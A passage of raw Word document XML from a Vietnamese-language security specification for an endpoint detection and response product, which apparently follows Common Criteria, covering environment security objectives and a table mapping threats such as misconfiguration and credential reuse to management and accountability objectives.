        <w:t>gói TLS), FCS_HTTPS_EXT.1 (từ Base-PP),  FCS_TLSC_EXT.1 (từ  TLS  Package), FCS_TLSC_EXT.2 (từ  gói TLS), FCS_TLSS_EXT.1 (từ  gói TLS ), FCS_TLSS_EXT.2 (từ  gói TLS ),  FPT_ITT.1,  FTP_TRP.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE06D02" w14:textId="4CAF6114" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho môi trường hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2B765" w14:textId="74B2AA97" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Môi trường hoạt động của TOE thực hiện các biện pháp kỹ thuật và thủ tục để hỗ trợ TOE cung cấp chính xác chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> của mình (được xác định bởi các mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho TOE). Các mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho Môi trường hoạt động bao gồm một tập hợp các yếu tố mô tả các mục tiêu mà Môi trường hoạt động nên đạt được. Phần này xác định các mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ được giải quyết bởi </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>biện pháp kỹ thuật</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc bằng các phương </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pháp</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> phi kỹ thuật hoặc thủ tục. Các giả định phủ nhận trong Phần 3 được kết hợp như các mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho môi trường. Các mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau đây cho Môi trường hoạt động hỗ trợ EDR cung cấp chính xác chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> của nó. Các mục tiêu này đồng bộ với các giả định về môi trường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F029D73" w14:textId="0CCE6CC7" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Trung chuyển tin cậy</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(OE.RELIABLE_TRANSIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EECB6" w14:textId="6659D6AF" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kết nối truyền dữ liệu giữa EDR và các Tác nhân máy chủ (có d</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ây hoặc không dây</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> kết nối thích hợp, đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D0C1BF" w14:textId="482D84DE" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Phân tách mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A59DA4" w14:textId="1315254D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phần này mô tả cách các giả định, mối đe dọa và chính sách </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> của tổ chức ánh xạ đến các mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22376BE2" w14:textId="2CD7BAEF" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc375738452"/>
      <w:bookmarkStart w:id="20" w:name="_Toc502096844"/>
      <w:bookmarkStart w:id="21" w:name="_Toc502652909"/>
      <w:bookmarkStart w:id="22" w:name="_Toc136104116"/>
      <w:bookmarkStart w:id="23" w:name="_Toc137476360"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9 Các yêu cầu </w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w14:paraId="3D177A44" w14:textId="77777777" w:rsidTr="00BE21A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="370ED5E1" w14:textId="42E9792C" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mối nguy, Giả định</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2FF5E0" w14:textId="2038C639" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Đối tượng </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF863BE" w14:textId="6ACF9C93" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Đặc điểm về tính nhất quán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w14:paraId="69B0F596" w14:textId="77777777" w:rsidTr="00BE21A6">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48BA617D" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId38" w:anchor="T.MISCONFIGURATION" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>T.MISCONFIGURATIO</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313AC9A2" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>Cấu hình sai)</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75621CC" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId39" w:anchor="O.EDR_MANAGEMENT" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>O.EDR_MANAGEMENT</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7E5B4FB2" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>(Quản lý EDR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100D4F89" w14:textId="59F2C90A" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Mối đe dọa </w:t>
            </w:r>
            <w:hyperlink r:id="rId40" w:anchor="T.MISCONFIGURATION" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>T.MISCONFIGURATION</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>được kiểm soát bằng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId41" w:anchor="O.EDR_MANAGEMENT" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>O.EDR_MANAGEMENT</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> vì </w:t>
            </w:r>
            <w:r w:rsidR="00641FE8" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>đối tượng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> này dựa trên khả năng quản lý được ủy quyền đối với các hoạt động quản trị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w14:paraId="72949B4A" w14:textId="77777777" w:rsidTr="00BE21A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44CA6BE2" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>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2499A8A0" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId42" w:anchor="O.ACCOUNTABILITY" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>O.ACCOUNTABILITY</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="0000FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>(T</w:t>
            </w:r>
            <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
              <w:t>rách nhiệm giải trình)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35E6CEB4" w14:textId="6DC65088" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Mối đe dọa </w:t>
            </w:r>
            <w:hyperlink r:id="rId43" w:anchor="T.MISCONFIGURATION" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>T.MISCONFIGURATION</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E51F39" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>được kiểm soát bằng</w:t>
            </w:r>
            <w:r w:rsidR="00E51F39" w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId44" w:anchor="O.ACCOUNTABILITY" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>O.ACCOUNTABILITY</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>v</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">ì </w:t>
            </w:r>
            <w:r w:rsidR="00641FE8" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>đối tượng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> này dựa trên danh tính, xác thực và kiểm tra các hoạt động quản trị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w14:paraId="286AE248" w14:textId="77777777" w:rsidTr="00BE21A6">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4A166629" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:anchor="T.CREDENTIAL_REUSE" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>T.CREDENTIAL_REUSE</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="585A0B89" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
